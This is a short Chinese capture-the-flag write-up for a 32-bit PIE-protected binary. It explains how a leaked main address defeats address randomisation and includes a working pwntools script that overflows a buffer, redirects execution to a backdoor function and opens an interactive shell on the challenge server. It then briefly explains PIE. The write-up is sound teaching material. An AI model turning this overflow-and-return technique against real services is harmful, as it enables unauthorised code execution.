解题思路
file
32位
checkesc
pie保护
在这里可以看到直接将main地址直接泄露
有后门函数,但是开启了PIE保护
如果没有PIE——简单的ret2text,在vuln中的read处将程序执行流劫持到后门函数处即可。
然而存在PIE——所有的地址都是从一开始随机确定的,但是相对偏移量保持不变
获取了main的真实地址——可以通过相对偏移量推出其他任意地址,然后就是正常的ret2text即可
from pwn import *
i = remote("node5.anna.nssctf.cn",28341)
main_address = 0x770
shell_address = 0x80F
i.recvuntil(b'gift!')
df = shell_address-main_address
main_real_addr = int(i.recv()[1:11],16)
print(main_real_addr)
payload = b'a'*(0x28+4)+p32(main_real_addr+df)
i.sendline(payload)
i.interactive()
关于PIE保护
什么是PIE保护呢?这是官方的解释:
PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。